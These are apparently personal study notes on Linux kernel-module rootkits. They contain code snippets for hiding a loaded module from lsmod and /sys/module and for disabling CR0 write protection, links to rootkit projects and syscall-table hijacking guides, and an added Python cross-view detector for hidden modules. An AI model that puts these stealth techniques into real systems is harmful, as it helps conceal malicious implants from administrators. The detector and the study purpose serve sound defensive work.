Tutorials

Series 1

Linux Rootkit: Writing and Hiding a Basic LKM

Linux Rootkit series, follow-up

Linux Rootkit, Part 4

Series 2

Linux Rootkits Part 1: Introduction and Workflow

Miscellaneous

hiding-cryptominers-linux

Videos

Linux LKM Rootkit Tutorial | Linux Kernel Module Rootkit | Part 1

Linux LKM Rootkit Tutorial | Linux Kernel Module Rootkit | Part 2

Linux LKM Rootkit Tutorial | Protect Yourself From MALICIOUS LKM with rkhunter & chkrootkit | Part 3

Projects

rootkits

hids

Notes

  • Header files

    #include <linux/kernel.h>
    #include <linux/init.h>
    #include <linux/module.h>

  • Registration and unloading

module_init(func)

module_exit(func)

  • Basic skeleton

    /* entry point, runs on insmod: return 0 on success, a negative errno on failure */
    static int __init rootkit_init(void)
    {
        return 0;
    }

    /* exit point, runs on rmmod */
    static void __exit rootkit_exit(void)
    {
    }

    /* the metadata macros take string arguments; these values are placeholders */
    MODULE_AUTHOR("author name");
    MODULE_LICENSE("GPL");
    MODULE_DESCRIPTION("module description");
    MODULE_VERSION("0.1");

    module_init(rootkit_init);
    module_exit(rootkit_exit);

https://blog.csdn.net/whatday/article/details/96986296

https://xcellerator.github.io/posts/linux_rootkits_02/

Hiding from lsmod

    #include <linux/list.h>
    /* kernel prototype from <linux/list.h> */
    static inline void list_del_init(struct list_head *entry);
    /* called from __init: unlink this module from the kernel's module list,
       which is what lsmod and /proc/modules walk */
    list_del_init(&__this_module.list);

Hiding from /sys/module

    #include <linux/module.h>

  The structures form a cycle: struct module holds a struct module_kobject (mkobj), which holds the struct kobject behind the /sys/module/<name> directory and a pointer back to the struct module, and so on.

    struct module_kobject {
        struct kobject kobj;
        struct module *mod;
    };

    /* in module.h */
    extern struct module __this_module;
    #define THIS_MODULE (&__this_module)

    /* in kobject.h */
    extern void kobject_del(struct kobject *kobj);

    /* called from __init: remove this module's kobject, and with it its /sys/module entry */
    kobject_del(&THIS_MODULE->mkobj.kobj);
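The two hiding steps above remove a module from different views of the kernel: /proc/modules (what lsmod reads) and /proc/kallsyms both walk the kernel's module list, so list_del_init drops the module from both, while /sys/module is driven by the kobject and is untouched; kobject_del does the reverse. A host checker can use that asymmetry. The script below is an added example, not code from this page or from any of the linked projects; it assumes the standard Linux procfs/sysfs layout (/proc/modules, /proc/kallsyms, /sys/module/<name>/initstate for loaded modules) and embeds constructed sample data so it also runs offline. A module absent from all three views is, by construction, not flagged by this check.

```python
"""Cross-view check for loaded kernel modules (added example, constructed data).

Views compared:
  proc     - /proc/modules, the list behind lsmod (walks the kernel module list)
  kallsyms - /proc/kallsyms, module symbols carry a trailing "[name]" tag
             (also walks the module list)
  sys      - /sys/module/<name>, backed by the module's kobject
A module present in some views but not all is reported.
"""
import os
import re
import sys

# A module's symbols in /proc/kallsyms end with "\t[modname]".
_KALLSYMS_MOD = re.compile(r"\[([^\]]+)\]\s*$")


def parse_proc_modules(text):
    """Return the module names in /proc/modules text (first column of each line)."""
    names = set()
    for line in text.splitlines():
        fields = line.split()
        if fields:
            names.add(fields[0])
    return names


def parse_kallsyms(text):
    """Return the set of module names tagged on /proc/kallsyms lines."""
    names = set()
    for line in text.splitlines():
        m = _KALLSYMS_MOD.search(line)
        if m:
            names.add(m.group(1))
    return names


def loaded_sys_modules(sys_module_dir="/sys/module"):
    """Return names under /sys/module that belong to loaded modules.

    Built-in code also gets a /sys/module/<name> directory (for parameters),
    so only entries exposing the 'initstate' attribute, which loaded modules
    have, are kept.
    """
    names = set()
    try:
        entries = os.listdir(sys_module_dir)
    except OSError:
        return names
    for name in entries:
        if os.path.exists(os.path.join(sys_module_dir, name, "initstate")):
            names.add(name)
    return names


def find_discrepancies(proc_mods, sys_mods, kallsyms_mods):
    """Map each module missing from at least one view to the views it appears in."""
    views = {"proc": proc_mods, "sys": sys_mods, "kallsyms": kallsyms_mods}
    all_names = set().union(*views.values())
    result = {}
    for name in all_names:
        present = {view for view, members in views.items() if name in members}
        if len(present) != len(views):
            result[name] = present
    return result


# Constructed sample data (not captured from a real system).
# hidden_a: unlinked from the module list -> only its sysfs entry remains
# hidden_b: kobject deleted -> still in /proc/modules and /proc/kallsyms
SAMPLE_PROC_MODULES = """\
ext4 811008 2 - Live 0xffffffffc0500000
hidden_b 16384 0 - Live 0xffffffffc0700000
"""
SAMPLE_SYS_MODULE = {"ext4", "hidden_a"}
SAMPLE_KALLSYMS = """\
ffffffffc0512000 t ext4_sync_fs\t[ext4]
ffffffffc0702000 t other_fn\t[hidden_b]
ffffffff81000000 T _text
"""


def check_sample():
    """Run the cross-view check over the constructed sample data."""
    return find_discrepancies(parse_proc_modules(SAMPLE_PROC_MODULES),
                              SAMPLE_SYS_MODULE,
                              parse_kallsyms(SAMPLE_KALLSYMS))


def check_live():
    """Run the cross-view check against the running kernel (Linux only)."""
    with open("/proc/modules") as f:
        proc_mods = parse_proc_modules(f.read())
    with open("/proc/kallsyms") as f:
        kallsyms_mods = parse_kallsyms(f.read())
    return find_discrepancies(proc_mods, loaded_sys_modules(), kallsyms_mods)


if __name__ == "__main__":
    findings = check_live() if "--live" in sys.argv[1:] else check_sample()
    all_views = {"proc", "sys", "kallsyms"}
    for name, present in sorted(findings.items()):
        print(f"{name}: present in {sorted(present)}, missing from {sorted(all_views - present)}")
```

Run it without arguments for the sample data, or with --live on a Linux host to compare the real views; root is not required to read the three sources, although /proc/kallsyms addresses are zeroed for unprivileged users, which does not affect the module tags this check relies on.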

disable_protection

    #include <linux/bitops.h>        /* set_bit / clear_bit */
    #include <asm/special_insns.h>   /* read_cr0 / write_cr0 (x86) */

    /* clear CR0.WP (bit 16) so the kernel can write to read-only pages;
       on Linux 5.3 and later write_cr0() pins WP and refuses to clear it,
       emitting a warning instead */
    void
    disable_protection(void) {
        unsigned long cr0 = read_cr0();
        clear_bit(16, &cr0);
        write_cr0(cr0);
    }

    /* set CR0.WP again */
    void
    enable_protection(void) {
        unsigned long cr0 = read_cr0();
        set_bit(16, &cr0);
        write_cr0(cr0);
    }

struct kobject is the structure the device model is built from

ftrace refs:
https://blog.csdn.net/sganchang/article/details/91374486
https://blog.csdn.net/dog250/article/details/84667690
https://blog.csdn.net/pwl999/article/details/107426138
https://xz.aliyun.com/t/2948
https://www.apriorit.com/dev-blog/546-hooking-linux-functions-2
https://hackmd.io/@hankluo6/hideproc
https://hackmd.io/@hankluo6

suterusu
Works:

  • self-hiding
  • process hiding
  • port hiding

Does not work well:

  • file hiding

Not implemented:

  • directory hiding

https://poppopret.org/2013/01/07/suterusu-rootkit-inline-kernel-function-hooking-on-x86-and-arm/#comments

https://www.j0s1ph.com/?p=5940

Common structures & APIs

intrusive linked list: struct list_head
struct seq_file
struct dir_context
list_for_each_entry
list_add
list_del

set_bit(long nr, volatile unsigned long *addr);
clear_bit(long nr, volatile unsigned long *addr);

dev_get_flags

proc_filldir
root_filldir

proc_iterate
root_iterate

simple_strtol

copy_from_user
cap_set_full
commit_creds

kfree
kmalloc

DEFINE_SPINLOCK(spinlock);
spin_lock_irqsave
spin_unlock_irqrestore

Why convert to hexadecimal?


hijack_start: registers the hook

hijack_pause: pauses the hook; our own action follows after it
hijack_resume: puts the original action back
hijack_stop: removes the hook

disable_wp
restore_wp

kallsyms_on_each_symbol

arm_write_hook

task_struct
https://www.jianshu.com/p/691d02380312

mm_segment
https://docs.huihoo.com/doxygen/linux/kernel/3.7/structmmsegmentt.html

rootkit
https://docs-conquer-the-universe.readthedocs.io/zh_CN/latest/linux_rootkit/sys_call_table.html

source codes
https://github.com/peaceSh4wn/research-rootkit/tree/master/1-sys_call_table

how to find syscall_table (a very smooth, comfortable introduction)
https://infosecwriteups.com/linux-kernel-module-rootkit-syscall-table-hijacking-8f1bc0bd099c

  • The set_fs and get_fs in this article fail to compile; possibly a typo

Need to stay focused